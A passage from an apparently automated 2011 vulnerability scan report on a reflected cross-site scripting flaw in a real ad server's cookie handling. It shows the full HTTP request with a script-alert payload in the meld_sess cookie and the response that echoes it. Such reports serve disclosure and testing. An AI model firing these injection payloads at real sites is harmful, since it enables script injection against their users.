lRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjkyMjkwMiwgImJ1eSI6NDI1MCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozNDU5NiwgImJ1eSI6MTgzLCJscCI6Imh0dHBzOi8vdXMuYmF0dGxlLm5ldC9hY2NvdW50L2NyZWF0aW9uL3dvdy9zaWdudXAvO2pzZXNzaW9uaWQ9QTI5MTMzNTBGOENEMUIxQzRFRUVGQ0I5MzBDMzFFOUMuYmxhZGUzNF8wMiIsImFuIjoiV29ybGQgb2YgV2FyY3JhZnQiLCJzdGF0dXMiOiIwLjA3IiwiZmlkIjoxNzIsICJmY3BtIjoiMC43MCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ2NzgsICJidXkiOjE5OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzEifQ==
Content-Length: 1539
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:29:00 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":2050359,"adProviderId":2,"adProviderName":"collective","width":160,"height":600,"container":"ADMELD76212205993","bid":0.84,"requestId":"72925041-75d7-4786-811c-f7ab413
...[SNIP]...
=\"600\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" border=\"0\" scrolling=\"no\" src=\"http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9b4964<script>alert(1)</script>e017567acbc/72925041-75d7-4786-811c-f7ab4132c6b3?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349340\">
...[SNIP]...

3.517. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [meld_sess cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the meld_sess cookie is copied into the HTML document as plain text between tags. The payload 9a684<script>alert(1)</script>c62a7d5c400 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD6529836193 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb99a684<script>alert(1)</script>c62a7d5c400; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgNDg3MTE4MSwgIG5ldHdvcms6ICAgICAgImdsYW1jb250ZXh0d2ViIiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTYiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjhmOWVkODI2LWE5ZTEtNDdlZS04NjJjLTVjMTllOTA4ZjJjNSIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjk5YTY4NDxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5jNjJhN2Q1YzQwMCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMzY3NjMxNjY3IiwgIGRpdjogICAgICAgICAgIjhmOWVkODI2LWE5ZTEtNDdlZS04NjJjLTVjMTllOTA4ZjJjNSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vcG9wb250aGVwb3AuY29tLzIwMTEvMDQvbGluZHNheS1sb2hhbi1sb3Nlcy12aWN0b3JpYS1nb3R0aS1yb2xlLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDY5MywgIGFjY291bnRfaWQ6ICAgMTEwMjg3LCAgbmV0d29ya19uYW1lOiAiR2xhbSBDb250ZXh0V2ViIChBRU0pIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZ2xhbSIsICBlY3BtOiAgICAgICAgICIxLjE2IiwgIGZlY3BtOiAgICAgICAgIjEuMTYiLCAgZmlsbDogICAgICAgICAiMjQuOTkiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjM0NDM3LCAiYnV5IjoxNzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTMzNzY0LCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzAwMTQ0LCAiYnV5IjoxMjQ0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlhBLm5ldCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI2MjE1NywgImJ1eSI6MjAzNywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDEwMzcyMCwgImJ1eSI6NTIwOSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6OTIyOTYwLCAiYnV5Ijo0MjUyLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjM0NTU1LCAiYnV5IjoxOTYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ3MTQsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzI0In0=
Content-Length: 1541
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:06 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:06 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAd({"ad":{"id":4871181,"adProviderId":693,"adProviderName":"glamcontextweb","width":728,"height":90,"container":"ADMELD6529836193","bid":1.16,"requestId":"8f9ed826-a9e1-47ee-862c-5c1
...[SNIP]...
ht=\"90\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" border=\"0\" scrolling=\"no\" src=\"http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb99a684<script>alert(1)</script>c62a7d5c400/8f9ed826-a9e1-47ee-862c-5c19e908f2c5?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349286\">
...[SNIP]...

Report generated by XSS.CX at Sun Oct 23 12:56:57 CDT 2011.